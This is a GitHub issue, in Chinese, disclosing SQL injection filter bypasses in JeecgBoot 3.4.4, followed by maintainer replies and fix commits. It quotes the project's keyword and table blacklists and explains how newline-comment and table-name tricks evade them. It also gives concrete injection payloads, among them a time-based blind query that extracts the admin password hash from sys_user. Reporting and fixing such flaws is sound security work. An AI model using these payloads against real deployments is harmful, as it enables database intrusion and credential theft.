Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SqlInjectionUtil类中sql的注释正则为
private final static Pattern SQL_ANNOTATION = Pattern.compile("/\\*.*\\*/");
.无法匹配到%0A, 导致可以利用/*%0A*/绕过 关键字检测后存在空格,导致绕过
private final static String XSS_STR = "and |extractvalue|updatexml|exec |insert |select |delete |update |drop |count |chr |mid |master |truncate |char |declare |;|or |+|user()";
AbstractQueryBlackListHandler类中的黑名单:
ruleMap.put("sys_user", "password,salt");
在isPass函数中ruleMap.get(name)为null即可绕过, 可以采用sys_user, (sys_user), sys_user%20等绕过
sys_user
存在多个注入点:
dataId=2000&fieldName=(select(if(((select/*%0A*/password/*%0A*/from/*%0A*/sys_user/*%0A*/where/*%0A*/username/*%0A*/='jeecg')='eee378a1258530cb'),sleep(4),1)))&fieldVal=1000&tableName=sys_log
?dictCode=sys_user%20,username,password
?table=%60sys_user%60&pageSize=22&pageNo=1&text=username&code=password
The text was updated successfully, but these errors were encountered:
/%0A/,sys_user, (sys_user), sys_user%20,%60sys_user%60等问题已修改
/sys/api/getDictItems 该接口用于微服务间调用,未设置签名校验,如使用微服务,可以在网关的filter里将/sys/api/的接口调用禁掉
Sorry, something went wrong.
已修复
修复 sql注入漏洞 #4393
0fc374d
修复 sql注入漏洞 jeecgboot#4393
4e4aaf4
No branches or pull requests
版本号:3.4.4
前端版本:vue2版
问题描述:sql注入检测代码存在绕过.
截图&代码:
SqlInjectionUtil类中sql的注释正则为
.无法匹配到%0A, 导致可以利用/*%0A*/绕过
关键字检测后存在空格,导致绕过
AbstractQueryBlackListHandler类中的黑名单:
在isPass函数中ruleMap.get(name)为null即可绕过, 可以采用
sys_user, (sys_user), sys_user%20等绕过存在多个注入点:
该接口没有进行签名校验:
友情提示(为了提高issue处理效率):
The text was updated successfully, but these errors were encountered: